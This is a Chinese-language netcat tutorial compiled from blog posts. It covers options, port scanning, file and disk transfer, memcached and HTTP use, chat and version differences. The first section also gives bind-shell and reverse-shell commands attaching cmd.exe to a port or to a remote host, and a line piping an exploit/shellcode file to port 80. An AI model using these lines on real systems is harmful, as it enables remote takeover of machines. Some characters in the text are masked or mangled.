Linux nc (netcat) 詳解

功能說明：強大的網絡工具
語　　法：nc [-hlnruz][-g<網關...>][-G<指向器數目>][-i<延遲秒數>][-o<輸出文件>][-p<通訊端口>][-s<來源位址>][-v...][-w<超時秒數>][主機名稱][通訊端口...]
參　　數：
  -g<網關>  設置路由器躍程通訊網關，最多可設置8個。
  -G<指向器數目>  設置來源路由指向器，其數值爲4的倍數。
  -h   在線幫助。
  -i<延遲秒數>  設置時間間隔，以便傳送信息及掃描通訊端口。
  -l   使用監聽模式，管控傳入的資料。
  -n   直接使用IP地址，而不經過域名服務器。
  -o<輸出文件>  指定文件名稱，把往來傳輸的數據以16進制字碼傾倒成該文件保存。
  -p<通訊端口>  設置本地主機使用的通訊端口。
  -r   亂數指定本地與遠端主機的通訊端口。
  -s<來源位址>  設置本地主機送出數據包的IP地址。
  -u   使用UDP傳輸協議。
  -v   顯示指令執行過程。
  -w<超時秒數>  設置等待連線的時間。
  -z   使用0輸入/輸出模式，只在掃描通訊端口時使用。

linux nc (netcat)最新版×××及nc命令詳解

http://netcat.sourceforge.net/

 

擴展資料一: nc簡單使用示例

簡單用法舉例
1.端口掃描
# nc -v -w 2 192.168.2.34 -z 21-24
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh]succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused

2.從192.168.2.33拷貝文件到192.168.2.34
在192.168.2.34上： nc -lp 1234 > test.txt
在192.168.2.33上： nc 192.168.2.34 1234 < test.txt

3.簡單聊天工具
在192.168.2.34上： nc -l 1234
在192.168.2.33上： nc 192.168.2.34 1234
這樣，雙方就能夠相互交流了。使用ctrl+C(或D）退出。

4.用nc命令操做memcached
1）存儲數據：printf "setkey 0 10 6rnresultrn」 |nc 192.168.2.34 11211
2）獲取數據：printf 「get keyrn」 |nc 192.168.2.34 11211
3）刪除數據：printf 「delete keyrn」 |nc 192.168.2.34 11211
4）查看狀態：printf "statsrn」 |nc 192.168.2.34 11211
5）模擬top命令查看狀態：watch 「echo stats」 |nc 192.168.2.34 11211
6）清空緩存：printf 「flush_allrn」 |nc 192.168.2.34 11211 (當心操做，清空了緩存就沒了）

nc -l 1234

nc 127.0.0.1 1234

在端口1234創建鏈接，互相發送輸入
nc -p 1234 -w 5 host.example.com 80

創建從本地1234端口到host.example.com的80端口鏈接，5秒超時
nc -u host.example.com 53
u爲UDP鏈接

echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com 80
鏈接到主機並執行
nc -v -z host.example.com 70-80
掃描端口(70到80)，可指定範圍。-v輸出詳細信息。 

5.鏈接到遠程主機
格式：nc -nvv 192.168.x.x 80
講解：連到192.168.x.x的TCP80端口
6.監聽本地主機
格式：nc -l -p 80
講解：監聽本機的TCP80端口
7.掃描遠程主機
格式：nc -nvv -w2 -z 192.168.x.x 80-445
講解：掃描192.168.x.x的TCP80到TCP445的全部端口
8.REMOTE主機綁定SHELL，例子：
格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
講解：綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口
9.REMOTE主機綁定SHELL並反向鏈接，例子：
格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
講解：綁定REMOTE主機的CMDSHELL並反向鏈接到192.168.x.x的TCP5354端口
以上爲最基本的幾種用法（其實NC的用法還有不少，
當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......）。
10.做***程序用，例子：
格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2：nc -nvv 192.168.x.x 80 < c:\exploit.txt
講解：鏈接到192.168.x.x的80端口，並在其管道中發送'c:\exploit.txt'的內容(兩種格式確有相同的效果，真是有殊途同歸之妙:P)
附：'c:\exploit.txt'爲shellcode等
11.做蜜罐用[1]，例子：
格式：nc -L -p 80
講解：使用'-L'(注意L是大寫)能夠不停地監聽某一個端口，直到ctrl+c爲止
12.做蜜罐用[2]，例子：
格式：nc -L -p 80 > c:\log.txt
講解：使用'-L'能夠不停地監聽某一個端口，直到ctrl+c爲止，同時把結果輸出到'c:\log.txt'中，若是把‘>'
　 改成‘>>'便可以追加日誌
附：'c:\log.txt'爲日誌等
13.做蜜罐用[3]，例子：
格式1：nc -L -p 80 < c:\honeypot.txt
格式2：type.exe c:\honeypot.txt|nc -L -p 80
講解：使用'-L'能夠不停地監聽某一個端口，直到ctrl+c爲止，並把'c:\honeypot.txt'的內容‘送'入其管道中！
14.備份檔案
A機的資料夾 /data備份到B主機的backup.tgz
源主機: tar czf - work|nc -l -c -p 1234
目的主機: nc 192.168.0.1 1234 >a.tgz
或
A:tar -zcf data|nc -l -p 4444
B:nc a 4444 >backup.tgz
傳完後ctrl+c中斷鏈接,這樣A主機不會生成檔案直接傳到了backup.tgz,缺點就是不知道啥時候傳完,嘿嘿

 

擴展資料二:命令linux nc命令傳輸文件

nc到底幹嗎用的我很少描述，今天主要講下用nc傳輸文件。因爲公司的設備sudo後沒有ssh，scp等遠程接入命令，或host.deny裏面設置了ssh的deny，無論怎樣的緣由。我今天跨過你們經常使用的scp,來講明下一個更有用的輕量級工具，nc的另外一個強大的功---文件傳輸。
範例以下：
目的主機監聽
nc -l 監聽端口  >要接收的文件名
nc -l 4444 > cache.tar.gz

源主機發起請求
nc  目的主機ip   目的端口
nc  192.168.0.85  4444 

netstat以下
[root@localhost jiangbao]# netstat -tpln
tcp        0      0 0.0.0.0:4444                0.0.0.0:*                   LISTEN      18166/nc 
英文描述以下
DATA TRANSFER
Start by using nc to listen on a specific port, with output captured into a file:
$ nc -l 1234 > filename.out
Using a second machine, connect to the listening nc process, feeding it the file whichis to be transferred:
$ nc host.example.com 1234

 

擴展資料三: linux nc (NetCat)命令詳解,這篇文章對nc的介紹很是詳細，和以上資料有部分重複.

1、版本

一般的Linux發行版中都帶有NetCat（簡稱nc），甚至在拯救模式光盤中也由busybox提供了簡版的nc工具。但不一樣的版本，其參數的使用略有差別。
NetCat 官方地址：http://netcat.sourceforge.net/

引用

[root@hatest1 ~]# cat /etc/asianux-release
Asianux release 2.0 (Trinity SP2)
[root@hatest1 ~]# cat /etc/redflag-release
Red Flag DC Server release 5.0 (Trinity SP2)
[root@hatest1 ~]# type -a nc
nc is /usr/bin/nc
[root@hatest1 ~]# rpm -q nc
nc-1.10-22
建議在使用前，先用man nc看看幫助。這裏以紅旗DC Server 5.0上的1.10版本進行簡單說明。
假設兩服務器信息：

引用

server1: 192.168.228.221
server2: 192.168.228.222

2、常見使用

1、遠程拷貝文件
從server1拷貝文件到server2上。須要先在server2上，用nc激活監聽，server2上運行：

[root@hatest2 tmp]# nc -lp 1234 > install.log
server1上運行：

引用

[root@hatest1 ~]# ll install.log
-rw-r–r–   1 root root 39693 12月 20   2007 install.log
[root@hatest1 ~]# nc -w 1 192.168.228.222 1234 < install.log

2、克隆硬盤或分區
操做與上面的拷貝是雷同的，只須要由dd得到硬盤或分區的數據，而後傳輸便可。
克隆硬盤或分區的操做，不該在已經mount的的系統上進行。因此，須要使用安裝光盤引導後，進入拯救模式（或使用Knoppix工具光盤）啓動系統後，在server2上進行相似的監聽動做：

# nc -l -p 1234 | dd of=/dev/sda

server1上執行傳輸，便可完成從server1克隆sda硬盤到server2的任務：

# dd if=/dev/sda | nc 192.168.228.222 1234

※完成上述工做的前提，是須要落實光盤的拯救模式支持服務器上的網卡，並正確配置IP。

3、端口掃描
能夠執行：

引用

# nc -v -w 1 192.168.228.222 -z 1-1000
hatest2 [192.168.228.222] 22 (ssh) open

4、保存Web頁面

# while true; do nc -l -p 80 -q 1 < somepage.html; done

5、模擬HTTP Headers

引用

[root@hatest1 ~]# ncwww.linuxso.com 80

GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser

 

HTTP/1.1 200 OK
Date: Tue, 16 Dec 2008 07:23:24 GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
[......]
在nc命令後，輸入紅色部分的內容，而後按兩次回車，便可從對方得到HTTP Headers內容。

6、聊天
nc還能夠做爲簡單的字符下聊天工具使用，一樣的，server2上須要啓動監聽：

[root@hatest2 tmp]# nc -lp 1234

server1上傳輸：

[root@hatest1 ~]# nc 192.168.228.222 1234

這樣，雙方就能夠相互交流了。使用Ctrl+D正常退出。

7、傳輸目錄
從server1拷貝nginx-0.6.34目錄內容到server2上。須要先在server2上，用nc激活監聽，server2上運行：

引用

[root@hatest2 tmp]# nc -l 1234 |tar xzvf -
server1上運行：

引用

[root@hatest1 ~]# ll -d nginx-0.6.34
drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
[root@hatest1 ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 1234

8、參數簡介
這僅是一個1.10版本的簡單說明，詳細的參數使用仍是須要看man：

引用

想要鏈接到某處: nc [-options] hostname port[s] [ports] …
綁定端口等待鏈接: nc -l -p port [-options] [hostname] [port]
參數:
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式，用於入站鏈接
-n 指定數字的IP地址，不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u UDP模式
-v 詳細輸出——用兩個-v可獲得更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——用於掃描時，其中端口號能夠指定一個或者用lo-hi式的指定範圍。

3、版本差別
不用系統上提供的nc版本會有說不一樣，其提供的參數使用方法也略有差別。
例如，紅旗Asianux 3.0 SP1拯救光盤上的版本是供使用的參數僅有一部分：

引用

# nc -h
BusyBox v1.2.0 (2008.04.14-01:35+0000) multi-call binary

Usage: nc [OPTIONS] [IP] [port]

Netcat opens a pipe to IP:port

Options:
         -l               listen mode, for inbound connects
         -p PORT         local port number
         -i SECS         delay interval for lines sent
         -e PROG         program to exec after connect (dangerous!)
         -w SECS         timeout for connects and final net reads
而在Asianux 3.0 SP1系統中提供的nc版本則是1.84的，按上面的參數用法寫會執行不了：

引用

[root@ftpserver ~]# rpm -q nc
nc-1.84-10
[root@ftpserver ~]# nc -lp 1234
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
           [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
           [-x proxy_address[:port]] [hostname] [port[s]]
講查看man文檔，可見在這個版本中，-l是不能與-s、-p、-z一塊兒使用的，-w參數也會被忽略，因此，正確的用法是：

[root@ftpserver tmp]# nc -l 1234

4、用在腳本中
nc每次啓動監聽後，都會在客戶端鏈接完成並退出的同時，服務端一同退出。因此，若是須要不斷的使用nc進行數據傳輸，須要在腳本中使用循環。利用nc實現更多的功能，可參考其rpm提供的參考腳本：

引用

# rpm -qd nc
/usr/share/doc/nc-1.10/Changelog
/usr/share/doc/nc-1.10/README
/usr/share/doc/nc-1.10/scripts/README
/usr/share/doc/nc-1.10/scripts/alta
/usr/share/doc/nc-1.10/scripts/bsh
/usr/share/doc/nc-1.10/scripts/dist.sh
/usr/share/doc/nc-1.10/scripts/irc

/usr/share/doc/nc-1.10/scripts/iscan
/usr/share/doc/nc-1.10/scripts/ncp
/usr/share/doc/nc-1.10/scripts/probe
/usr/share/doc/nc-1.10/scripts/web
/usr/share/doc/nc-1.10/scripts/webproxy
/usr/share/doc/nc-1.10/scripts/webrelay
/usr/share/doc/nc-1.10/scripts/websearch
/usr/share/man/man1/nc.1.gz

 

來源：http://blog.csdn.net/michael493439861/article/details/7445454